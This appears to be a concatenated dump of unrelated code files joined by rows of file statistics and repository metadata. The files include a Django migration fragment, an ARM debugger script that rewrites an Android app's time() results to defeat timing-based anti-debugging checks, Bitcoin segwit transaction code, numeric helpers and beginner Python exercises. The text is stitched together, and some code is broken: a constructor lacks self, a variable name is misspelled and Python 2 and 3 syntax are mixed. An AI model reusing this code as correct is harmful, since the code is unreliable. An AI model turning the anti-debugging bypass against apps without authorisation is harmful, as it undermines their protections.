model_name='personrole',
name='role_name',
field=models.CharField(max_length=100, null=True),
),
]
| 26.88 | 113 | 0.605655 | 70 | 672 | 5.642857 | 0.685714 | 0.091139 | 0.116456 | 0.136709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05499 | 0.269345 | 672 | 24 | 114 | 28 | 0.749491 | 0.066964 | 0 | 0.222222 | 1 | 0 | 0.2144 | 0.0608 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d580ac0342437490dbebbfefc2c13b2463ec74 | 4,265 | py | Python | ds5-scripts/aosp_8_1/arm/time.py | rewhy/happer | 3b48894e2d91f150f1aee0ce75291b9ca2a29bbe | [
"Apache-2.0"
] | 32 | 2021-04-08T05:39:51.000Z | 2022-03-31T03:49:35.000Z | ds5-scripts/aosp_8_1/arm/time.py | rewhy/happer | 3b48894e2d91f150f1aee0ce75291b9ca2a29bbe | [
"Apache-2.0"
] | 2 | 2021-04-14T08:31:30.000Z | 2021-08-29T19:12:09.000Z | ds5-scripts/aosp_8_1/arm/time.py | rewhy/happer | 3b48894e2d91f150f1aee0ce75291b9ca2a29bbe | [
"Apache-2.0"
] | 3 | 2021-06-08T08:52:56.000Z | 2021-06-23T17:28:51.000Z | # time.py
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
def cleanup():
if mmu.page_table is not None:
del mmu.page_table
gc.collect()
def start_prolog():
# disable the time breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_time:
brk_object.disable()
def end_prolog():
# enable the time breakpoint
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_time:
brk_object.enable()
TIME_INTERVAL = 1000000L # usec
def time():
# -- HEAD -- #
start_prolog()
# -- BODY -- #
pid = int(execution_state.getVariableService().readValue("$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
# only focus on the invocation from app -> gettimeofday
lr = int(execution_state.getRegisterService().getValue("LR")) & 0xffffffff
if not config.in_app_range(lr):
# -- TAIL -- #
end_prolog()
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# get timeval pointer
time_t_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
if config.debug:
print "[time] pid = %#x, lr = %0#10x, time_t_ptr = %0#10x" % (pid, lr, time_t_ptr)
config.log_print("[time] pid = %#x, lr = %0#10x, time_t_ptr = %0#10x" % (pid, lr, time_t_ptr))
brk_time = config.libc_base + config.time_end - config.libc_file_offset + config.libc_memory_offset
execution_state.getExecutionService().resumeTo(brk_time)
try:
execution_state.getExecutionService().waitForStop(60000) # wait for 60s
except DebugException:
raise RuntimeError("wtf !!!")
# obtain the obtained value
tv_sec = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
tv_usec = 0x0
if config.debug:
print "[time] (origin) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec)
# config.log_print("[time] (origin) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec))
# anti time checking
tv_sec_old, tv_usec_old = config.load_time_info()
if tv_sec <= tv_sec_old:
tv_sec = tv_sec_old + 0x1
if tv_sec < tv_sec_old:
# TODO: should raise an exception, but we just ignore it at this time
assert False
else:
if tv_sec_old != 0:
time_interval = (tv_sec * 1000000L) - (tv_sec_old * 1000000L)
if time_interval > TIME_INTERVAL:
tv_sec_new = int(((tv_sec_old * 1000000L) + TIME_INTERVAL) / 1000000L)
tv_usec_new = int(((tv_sec_old * 1000000L) + TIME_INTERVAL) - (tv_sec_new * 1000000L))
assert tv_usec_new == 0
# verification
time_old = tv_sec_old * 1000000L + tv_usec_old
time_new = tv_sec_new * 1000000L + tv_usec_new
assert time_new == (time_old + TIME_INTERVAL)
config.save_time_info(tv_sec_new, tv_usec_new)
execution_state.getRegisterService().setValue("R0", tv_sec_new)
# obtain the adjusted value
tv_sec = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
tv_usec = 0x0
if config.debug:
print "[time] (adjust) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec)
# config.log_print("[time] (adjust) pid = %#x, tv_sec = %0#10x, tv_usec = %0#10x" % (pid, tv_sec, tv_usec))
else:
config.save_time_info(tv_sec, tv_usec)
elif tv_sec_old == 0 and tv_usec_old == 0:
config.save_time_info(tv_sec, tv_usec)
else:
raise RuntimeError("invalid timeval valus !!!")
# -- TAIL -- #
end_prolog()
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
if __name__ == '__main__':
time()
sys.exit()
| 32.557252 | 126 | 0.687222 | 584 | 4,265 | 4.75 | 0.246575 | 0.055876 | 0.028839 | 0.023792 | 0.537131 | 0.50036 | 0.46323 | 0.443403 | 0.397981 | 0.397981 | 0 | 0.039409 | 0.190856 | 4,265 | 130 | 127 | 32.807692 | 0.764416 | 0.161547 | 0 | 0.317073 | 0 | 0.04878 | 0.093732 | 0.014646 | 0 | 0 | 0.02314 | 0.007692 | 0.036585 | 0 | null | null | 0 | 0.097561 | null | null | 0.04878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d8495b0fdeb7179e8f4818df4634dea3eb06dd | 312 | py | Python | 0118.Pascal's_Triangle/solution.py | WZMJ/Algorithms | 07f648541d38e24df38bda469665c12df6a50637 | [
"MIT"
] | 5 | 2020-05-23T02:18:26.000Z | 2021-07-05T05:36:01.000Z | 0118.Pascal's_Triangle/solution.py | WZMJ/Algorithms | 07f648541d38e24df38bda469665c12df6a50637 | [
"MIT"
] | 1 | 2020-06-10T07:17:24.000Z | 2020-07-20T02:21:24.000Z | 0118.Pascal's_Triangle/solution.py | WZMJ/Algorithms | 07f648541d38e24df38bda469665c12df6a50637 | [
"MIT"
] | 1 | 2019-04-23T13:01:50.000Z | 2019-04-23T13:01:50.000Z | class Solution:
def generate(self, num_rows):
if num_rows == 0:
return []
ans = [1]
result = [ans]
for _ in range(num_rows - 1):
ans = [1] + [ans[i] + ans[i + 1] for i in range(len(ans[:-1]))] + [1]
result.append(ans)
return result
| 28.363636 | 81 | 0.464744 | 42 | 312 | 3.357143 | 0.452381 | 0.148936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036649 | 0.387821 | 312 | 10 | 82 | 31.2 | 0.701571 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21dc1958ff8c27f13a30ce7881d7c3c522568e75 | 4,738 | py | Python | bin/ADFRsuite/CCSBpckgs/Volume/Operators/trilinterp.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/Volume/Operators/trilinterp.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | null | null | null | bin/ADFRsuite/CCSBpckgs/Volume/Operators/trilinterp.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
"MIT"
] | 1 | 2021-11-04T21:48:14.000Z | 2021-11-04T21:48:14.000Z | ################################################################################
##
## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this library; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
##
## (C) Copyrights Dr. Michel F. Sanner and TSRI 2016
##
################################################################################
def trilinterp(pts, map, inv_spacing, origin, output_8pts=0):
"""returns a list of values looked up in a 3D grid (map) at
3D locations (tcoords).
INPUT:
pts 3D coordinates of points to lookup
map, grid data (has to be a Numeric array)
inv_spacing, 1. / grid spacing (3-tuple)
origin minimum coordinates in x, y and z
OUTPUT:
values values at points
"""
##
##
## Authors: Garrett M. Morris, TSRI, Accelerated C version 2.2 (C++ code)
## David Goodsell, UCLA, Original FORTRAN version 1.0 (C code)
## Michel Sanner (python port)
## Date: 10/06/94, march 26 03
values = []
invx, invy, invz = inv_spacing
xlo, ylo, zlo = origin
maxx = map.shape[0] - 1
maxy = map.shape[1] - 1
maxz = map.shape[2] - 1
for x,y,z in pts:
u = (x-xlo) * invx
u0 = max(0, int(u)) # clamp at lower bound of volume
u0 = min(maxx, u0)
u1 = min(maxx, u0 + 1) # clamp at upper bounds of volume
u1 = max(0, u1)
if u0>=maxx: # outside on X+ axis
p0u = 1.0
p1u = 0.0
elif u0<=0: # outside on X- axis
p0u = 0.0
p1u = 1.0
else:
p0u = u - u0
p1u = 1. - p0u
v = (y-ylo) * invy
v0 = max(0, int(v)) # clamp at lower bound of volume
v0 = min(maxy, v0)
v1 = min(maxy, v0 + 1) # clamp at upper bounds of volume
v1 = max(0, v1)
if v0>=maxy: # outside on Y+ axis
p0v = 1.0
p1v = 0.0
elif v0<=0: # outside on Y- axis
p0v = 0.0
p1v = 1.0
else:
p0v = v - v0
p1v = 1. - p0v
w = (z-zlo) * invz
w0 = max(0, int(w)) # clamp at lower bound of volume
w0 = min(maxz, w0)
w1 = min(maxz, w0 + 1) # clamp at upper bounds of volume
w1 = max(0, w1)
if w0>=maxz: # outside on Z+ axis
p0w = 1.0
p1w = 0.0
elif w0<=0: # outside on Z- axis
p0w = 0.0
p1w = 1.0
else:
p0w = w - w0
p1w = 1. - p0w
m = 0.0
if output_8pts:
print '0:', m," + p1u=", p1u, "*p1v=", p1v, "*p1w=", p1w, "*map[ ", u0, "][", v0,"][", w0,"]"
m = m + p1u * p1v * p1w * map[ u0 ][ v0 ][ w0 ]
if output_8pts:
print '1:', m," + p1u=", p1u, " p1v=", p1v, " p0w=", p0w, " map[ ", u0, "][", v0,"][", w1,"]"
m = m + p1u * p1v * p0w * map[ u0 ][ v0 ][ w1 ]
if output_8pts:
print '2:', m," + p1u=", p1u, " p0v=", p0v, " plw=", p1w, " map[ ", u0, "][", v1,"][", w0,"]"
m = m + p1u * p0v * p1w * map[ u0 ][ v1 ][ w0 ]
if output_8pts:
print '3:', m," + p1u=", p1u, " p0v=", p0v, " p0w=", p0w, " map[ ", u0, "][", v1,"][", w1,"]"
m = m + p1u * p0v * p0w * map[ u0 ][ v1 ][ w1 ]
if output_8pts:
print '4:', m," + p0u=", p0u, " p1v=", p1v, " p1w=", p1w, " map[ ", u1, "][", v0,"][", w0,"]"
m = m + p0u * p1v * p1w * map[ u1 ][ v0 ][ w0 ]
if output_8pts:
print '5:', m," + p0u=", p0u, " p1v=", p1v, " p0w=", p0w, " map[ ", u1, "][", v0,"][", w1,"]"
m = m + p0u * p1v * p0w * map[ u1 ][ v0 ][ w1 ]
if output_8pts:
print '6:', m," + p0u=", p0u, " p0v=", p0v, " p1w=", p1w, " map[ ", u1, "][", v1,"][", w0,"]"
m = m + p0u * p0v * p1w * map[ u1 ][ v1 ][ w0 ]
if output_8pts:
print '7:', m," + p0u=", p0u, " p0v=", p0v, " p0w=", p0w, " map[ ", u1, "][", v1,"][", w1,"]"
m = m + p0u * p0v * p0w * map[ u1 ][ v1 ][ w1 ]
if output_8pts:
print 'end: m=', m
values.append(m)
return values
| 37.904 | 105 | 0.47003 | 671 | 4,738 | 3.299553 | 0.275708 | 0.045167 | 0.04878 | 0.069106 | 0.36495 | 0.191509 | 0.067299 | 0 | 0 | 0 | 0 | 0.087068 | 0.34065 | 4,738 | 124 | 106 | 38.209677 | 0.621639 | 0.265935 | 0 | 0.151899 | 0 | 0 | 0.084618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.113924 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21df81c4df3e4f5c8e3d15ec62909fed82741b3f | 6,633 | py | Python | python/coffer/coins/impl/_segwittx.py | Steve132/wallet_standard | 09c909b24dc17cf6a0a433644d8f1912e886ab1c | [
"MIT"
] | null | null | null | python/coffer/coins/impl/_segwittx.py | Steve132/wallet_standard | 09c909b24dc17cf6a0a433644d8f1912e886ab1c | [
"MIT"
] | null | null | null | python/coffer/coins/impl/_segwittx.py | Steve132/wallet_standard | 09c909b24dc17cf6a0a433644d8f1912e886ab1c | [
"MIT"
] | null | null | null | from _satoshitx import *
import struct
#https://bitcoincore.org/en/segwit_wallet_dev/
class SWitnessTransaction(STransaction):
def __init__(version,flag,ins,outs,witness,locktime):
super(SWitnessTransaction,self).__init__(version,ins,outs,locktime)
self.flag=flag
self.witness=witness
def serialize(self):
txo=self
#if(not isinstance(txo,SWitnessTransaction) and isinstance(txo,STransaction)):
# return STransaction._sc_serialize(txo)
out=bytearray()
out+=struct.pack('<L',txo.version)
out+=b'\x00'
out+=struct.pack('B',txo.flag)
out+=SVarInt(len(txo.ins)).serialize()
for inv in txo.ins:
out+=inv.serialize()
out+=SVarInt(len(txo.outs)).serialize()
for ot in txo.outs:
out+=ot.serialize()
if(len(txo.witness) != len(txo.ins)):
raise Exception("Witness data not the same length as number of inputs")
for wit in txo.witness: #load witness data
out+=SVarInt(len(wit)).serialize()
for wititem in wit:
out+=SVarInt(len(wititem)).serialize()
out+=wititem #TODO: .serialize()
out+=struct.pack('<L',txo.locktime)
return out
@staticmethod
def _sc_deserialize(sio):
version=struct.unpack('<L',sio.read(4))[0]
num_ins=SVarInt._sc_deserialize(sio)
if(num_ins!=0): #this is not a witness transaction
return STransaction._sc_deserialize(StringIO(sio.getvalue()))
flag=ord(sio.read(1))
num_ins=SVarInt._sc_deserialize(sio)
ins=[SInput._sc_deserialize(sio) for k in range(num_ins)]
num_outs=SVarInt._sc_deserialize(sio)
outs=[SOutput._sc_deserialize(sio) for k in range(num_outs)]
witness=[]
for _ in range(num_ins):
num_wititems=SVarInt._sc_deserialize(sio)
wititems=[]
for _ in range(num_wititems):
witsize=SVarInt._sc_deserialize(sio)
wititmes.append(sio.read(witsize))
witness.append(wititems)
locktime=struct.unpack('<L',sio.read(4))[0]
return SWitnessTransaction(version,flag,ins,outs,witness,locktime)
#TODO: from tx that calls coin.signature
def txid_hash(self):
return dblsha256(super(SWitnessTransaction,self).serialize())
def wtxid_hash(self):
return dblsha256(self.serialize())
def segwit_get_prevouthash(stxo):
out=bytearray()
for inp in stxo.ins:
out+=inp.outpoint.serialize()
return dblsha256(out)
"""template <class T>
uint256 GetPrevoutHash(const T& txTo)
{
CHashWriter ss(SER_GETHASH, 0);
for (const auto& txin : txTo.vin) {
ss << txin.prevout;
}
return ss.GetHash();
}"""
def segwit_get_sequencehash(stxo):
out=bytearray()
for inp in stxo.ins:
out+=struct.pack('<L',inp.sequence)
return dblsha256(out)
"""template <class T>
uint256 GetSequenceHash(const T& txTo)
{
CHashWriter ss(SER_GETHASH, 0);
for (const auto& txin : txTo.vin) {
ss << txin.nSequence;
}
return ss.GetHash();
}"""
def segwit_get_outputshash(stxo):
out=bytearray()
for outp in stxo.outs:
out+=outp.serialize()
return dblsha256(out)
"""template <class T>
uint256 GetOutputsHash(const T& txTo)
{
CHashWriter ss(SER_GETHASH, 0);
for (const auto& txout : txTo.vout) {
ss << txout;
}
return ss.GetHash();
}
"""
#TODO: segwit needs the right thing provided in script (redeemscript for p2sh or witness script or scriptPubKey for p2pkh)
#https://bitcoin.stackexchange.com/questions/57994/what-is-scriptcode
def segwit_preimage(stxo,script,input_index,nhashtype,amount=None):
hashPrevouts=b'\x00'*32
hashSequence=b'\x00'*32
hashOutputs=b'\x00'*32
nhashtype=int(nhashtype)
sho=SigHashOptions(nhashtype)
"""if (sigversion == SigVersion::WITNESS_V0) {
uint256 hashPrevouts;
uint256 hashSequence;
uint256 hashOutputs;
const bool cacheready = cache && cache->ready;
if (!(nHashType & SIGHASH_ANYONECANPAY)) {
hashPrevouts = cacheready ? cache->hashPrevouts : GetPrevoutHash(txTo);
}
if (!(nHashType & SIGHASH_ANYONECANPAY) && (nHashType & 0x1f) != SIGHASH_SINGLE && (nHashType & 0x1f) != SIGHASH_NONE) {
hashSequence = cacheready ? cache->hashSequence : GetSequenceHash(txTo);
}
if ((nHashType & 0x1f) != SIGHASH_SINGLE && (nHashType & 0x1f) != SIGHASH_NONE) {
hashOutputs = cacheready ? cache->hashOutputs : GetOutputsHash(txTo);
} else if ((nHashType & 0x1f) == SIGHASH_SINGLE && nIn < txTo.vout.size()) {
CHashWriter ss(SER_GETHASH, 0);
ss << txTo.vout[nIn];
hashOutputs = ss.GetHash();
}"""
if(not sho.anyonecanpay):
hashPrevouts=segwit_get_prevouthash(stxo)
if(not sho.anyonecanpay and sho.mode != SIGHASH_NONE and sho.mode != SIGHASH_SINGLE):
hashSequence=segwit_get_sequencehash(stxo)
if(sho.mode != SIGHASH_SINGLE and sho.mode != SIGHASH_NONE):
hashOutputs=segwit_get_outputshash(stxo)
elif(sho.mode == SIGHASH_SINGLE and input_index < len(stxo.ins)):
hashOutputs=dblsha256(stxo.outs[input_index].serialize())
"""
CHashWriter ss(SER_GETHASH, 0);
// Version
ss << txTo.nVersion;
// Input prevouts/nSequence (none/all, depending on flags)
ss << hashPrevouts;
ss << hashSequence;
// The input being signed (replacing the scriptSig with scriptCode + amount)
// The prevout may already be contained in hashPrevout, and the nSequence
// may already be contain in hashSequence.
ss << txTo.vin[nIn].prevout;
ss << scriptCode;
ss << amount;
ss << txTo.vin[nIn].nSequence;
// Outputs (none/one/all, depending on flags)
ss << hashOutputs;
// Locktime
ss << txTo.nLockTime;
// Sighash type
ss << nHashType;
return ss.GetHash();"""
out=bytearray()
out+=struct.pack('<L',stxo.version)
out+=hashPrevouts
out+=hashSequence
out+=stxo.ins[input_index].outpoint.serialize()
out+=SVarInt(len(script)).serialize()
out+=script
if(amount is None):
a=stxo.ins[input_index].prevout.value
else:
a=int(amount)
out+=struct.pack('<Q',a)
out+=struct.pack('<L',stxo.ins[input_index].sequence)
out+=hashOutputs;
out+=struct.pack('<L',stxo.locktime)
out+=struct.pack('<L',sho.nhashtype)
return out
def segwit_sighash(stxo,input_index,nhashtype,script=None,amount=None):
if(script is None):
#if(p2pkh)USE for
script=stxo.ins[input_index].prevout.scriptPubKey #TODO: is this correct? script seems to be the redeemScript for p2sh and other stuff YEAH use for p2sh when redeemScript includes CHECKSIG
#if(p2sh)
#script=stxo.ins[input_index].scriptSig[0] #redeemscript from scriptSig of input gives pubkey o
preimage=segwit_preimage(stxo,script,input_index,nhashtype,amount)
return dblsha256(preimage)
| 30.013575 | 192 | 0.692748 | 863 | 6,633 | 5.223638 | 0.23175 | 0.022183 | 0.025954 | 0.021739 | 0.281943 | 0.201198 | 0.150177 | 0.131766 | 0.053239 | 0.038154 | 0 | 0.015859 | 0.172923 | 6,633 | 220 | 193 | 30.15 | 0.805869 | 0.108096 | 0 | 0.134615 | 0 | 0 | 0.024626 | 0 | 0 | 0 | 0 | 0.013636 | 0 | 1 | 0.096154 | false | 0 | 0.019231 | 0.019231 | 0.221154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21e7aa187114df23f75c99353a77c5e6edd5021a | 1,067 | py | Python | CoTeTo/CoTeTo/import_file.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 3 | 2016-05-30T15:12:16.000Z | 2022-03-22T08:11:13.000Z | CoTeTo/CoTeTo/import_file.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | 21 | 2016-06-13T11:33:45.000Z | 2017-05-23T09:46:52.000Z | CoTeTo/CoTeTo/import_file.py | EnEff-BIM/EnEffBIM-Framework | 6328d39b498dc4065a60b5cc9370b8c2a9a1cddf | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
if sys.version_info >= (3, 3):
import importlib
def import_file(module_path='', module=''):
importlib.invalidate_caches()
if module in sys.modules:
del sys.modules[module]
sys.path.insert(0, module_path)
loader = importlib.find_loader(module)
del sys.path[0]
m = loader.load_module(module)
return m
elif sys.version_info >= (2, 7):
def import_file(module_path='', module=''):
if module in sys.modules:
del sys.modules[module]
sys.path.insert(0, module_path)
m = __import__(module)
del sys.path[0]
return m
else:
raise NotImplementedError('This modules functions are not implemented for python <2.7')
if __name__ == '__main__':
# test this module with path and module name as arguments
# will print modules namespace (without __builtins__)
import pprint
p, n = sys.argv[1:]
m = import_file(p, n)
d = m.__dict__
del d['__builtins__']
pprint.pprint(d)
| 23.711111 | 91 | 0.622306 | 143 | 1,067 | 4.391608 | 0.412587 | 0.063694 | 0.044586 | 0.06051 | 0.347134 | 0.292994 | 0.200637 | 0.200637 | 0.200637 | 0.200637 | 0 | 0.015424 | 0.270853 | 1,067 | 44 | 92 | 24.25 | 0.791774 | 0.1209 | 0 | 0.413793 | 0 | 0 | 0.083422 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.310345 | 0 | 0.448276 | 0.068966 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
21f110499fa4d164d3ecef0734601aa0553b4aba | 24,849 | py | Python | Homework1.py | nicolac1999/Homework-ADM | 3ab9f4afaa7fce4a1ffc38a45dbd3a199dba3737 | [
"MIT"
] | null | null | null | Homework1.py | nicolac1999/Homework-ADM | 3ab9f4afaa7fce4a1ffc38a45dbd3a199dba3737 | [
"MIT"
] | null | null | null | Homework1.py | nicolac1999/Homework-ADM | 3ab9f4afaa7fce4a1ffc38a45dbd3a199dba3737 | [
"MIT"
] | null | null | null | #Exercises of the Problem 1 (77/91)
#Say "Hello, World!" With Python
print ("Hello, World!")
#Python If-Else
import math
import os
import random
import re
import sys
if __name__ == '__main__':
n = int(raw_input().strip())
if n%2==1:
print("Weird")
else:
if n>2 and n<5 :
print("Not Weird")
if n>=6 and n<=20:
print("Weird")
if n>20 :
print ("Not Weird")
#Arithmetic Operators
if __name__ == '__main__':
a = int(raw_input())
b = int(raw_input())
print(a+b)
print(a-b)
print(a*b)
#Python: Division
from __future__ import division
if __name__ == '__main__':
a = int(raw_input())
b = int(raw_input())
print(a//b)
print(a/b)
#Loops
if __name__ == '__main__':
n = int(raw_input())
for i in range (0,n):
print(i*i)
#Write a function
def is_leap(year):
leap=False
if year%4==0:
leap= True
if year%100 == 0:
leap=False
if year%400==0:
leap= True
return leap
year = int(raw_input())
print is_leap(year)
year = int(raw_input())
print is_leap(year)
#Print Function
from __future__ import print_function
if __name__ == '__main__':
n = int(raw_input())
a=''
for i in range(1,n+1):
a+=str(i)
print(a)
#List Comprehensions
if __name__ == '__main__':
x = int(raw_input())
y = int(raw_input())
z = int(raw_input())
n = int(raw_input())
l=[[i,j,k] for i in range(0,x+1) for j in range(0,y+1) for k in range(0,z+1)]
s=[l[i] for i in range(0,len(l)) if sum(l[i])!=n]
print s
#Find the Runner-Up Score!
if __name__ == '__main__':
n = int(raw_input())
arr = map(int, raw_input().split())
arr2=[arr[i] for i in range(0,len(arr)) if arr[i]!=max(arr)]
print max(arr2)
#Nested Lists
if __name__ == '__main__':
l=[]
punteggi=[]
for _ in range(int(raw_input())):
name = raw_input()
score = float(raw_input())
l=l+[[name,score]]
punteggi+=[score]
punteggi2=[punteggi[i] for i in range(0,len(punteggi)) if punteggi[i]!=min(punteggi)]
minimo=min(punteggi2)
nomi=[l[i][0] for i in range (0,len(l)) if l[i][1]==minimo]
nomi.sort()
for n in nomi:
print (n)
#Finding the percentage
if __name__ == '__main__':
n = int(raw_input())
student_marks = {}
for _ in range(n):
line = raw_input().split()
name, scores = line[0], line[1:]
scores = map(float, scores)
student_marks[name] = scores
query_name = raw_input()
punteggio=student_marks[query_name]
print "%.2f"%(sum(punteggio)/len(punteggio))
#Lists
if __name__ == '__main__':
b=[]
N = int(input())
for _ in range(N):
a=input().split()
if a[0]=="insert":
b.insert(int(a[1]),int(a[2]))
elif a[0]=='print':
print(b)
elif a[0]=='remove':
b.remove(int(a[1]))
elif a[0]=='append':
b.append(int(a[1]))
elif a[0]=='sort':
b.sort()
elif a[0]=='pop':
b.pop()
elif a[0]=='reverse':
b.reverse()
#Tuples
if __name__ == '__main__':
n = int(input())
integer_list = map(int, input().split())
t=tuple(integer_list)
print(hash(t))
#sWAP cASE
def swap_case(s):
nuovaparola=""
for i in s:
if i.islower()==True:
nuovaparola+=i.upper()
else:
nuovaparola+=i.lower()
return nuovaparola
if __name__ == '__main__':
s = raw_input()
result = swap_case(s)
print result
#String Split and Join
def split_and_join(line):
a=line.split(" ")
a="-".join(a)
return a
if __name__ == '__main__':
line = raw_input()
result = split_and_join(line)
print result
#What's Your Name?
def print_full_name(a, b):
print ('Hello '+a+' '+b+'! You just delved into python.')
if __name__ == '__main__':
first_name = raw_input()
last_name = raw_input()
print_full_name(first_name, last_name)
#Mutations
def print_full_name(a, b):
print ('Hello '+a+' '+b+'! You just delved into python.')
if __name__ == '__main__':
first_name = raw_input()
last_name = raw_input()
print_full_name(first_name, last_name)
#Find a string
def count_substring(string, sub_string):
count=0
for i in range(0,len(string)):
if string[i]==sub_string[0]:
if string[i:i+len(sub_string)]==sub_string:
count+=1
return count
if __name__ == '__main__':
string = raw_input().strip()
sub_string = raw_input().strip()
count = count_substring(string, sub_string)
print count
#String Validators
if __name__ == '__main__':
s = raw_input()
a=0
for i in s :
a=a+1
if i.isalnum()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.isalpha()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.isdigit()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.islower()==True:
print('True')
break
if a==len(s):
print('False')
a=0
for i in s :
a=a+1
if i.isupper()==True:
print('True')
break
if a==len(s):
print('False')
#Text Alignment
a = int(input())
b = 'H'
for i in range(a):
print((b*i).rjust(a-1)+b+(b*i).ljust(a-1))
for i in range(a+1):
print((b*a).center(a*2)+(b*a).center(a*6))
for i in range((a+1)//2):
print((b*a*5).center(a*6))
for i in range(a+1):
print((b*a).center(a*2)+(b*a).center(a*6))
for i in range(a):
print(((b*(a-i-1)).rjust(a)+b+(b*(a-i-1)).ljust(a)).rjust(a*6))
#Text Wrap
import textwrap
def wrap(string, max_width):
a=''
k=0
for i in range(0,len(string)):
a+=string[i]
k+=1
if k==max_width:
print(a)
a=''
k=0
print(a)
return ''
if __name__ == '__main__':
string, max_width = raw_input(), int(raw_input())
result = wrap(string, max_width)
print result
#Designer Door Mat
l=list(map(int,input().split()))
n=l[0]
m=l[1]
for i in range(1,n,2):
print((i*'.|.').center(m,'-'))
print('WELCOME'.center(m,'-'))
for i in range(n-2,-1,-2):
print((i*'.|.').center(m, '-'))
#String Formatting
def print_formatted(number):
w=len(bin(number)[2:])
for i in range (1,number+1):
print(str(i).rjust(w)+' '+str(oct(i)[2:]).rjust(w)+' '+str(hex(i)[2:]).upper().rjust(w)+' '+str(bin(i)[2:]).rjust(w))
if __name__ == '__main__':
n = int(input())
print_formatted(n)
#Alphabet Rangoli
def print_rangoli(size):
lettere = 'abcdefghijklmnopqrstuvwxyz'
for i in range (size-1,0,-1):
riga=['-']*(4*size-3)
for j in range(0, size - i):
riga[2*(size-1+j)] = lettere[i+j]
riga[2*(size-1-j)] = lettere[i+j]
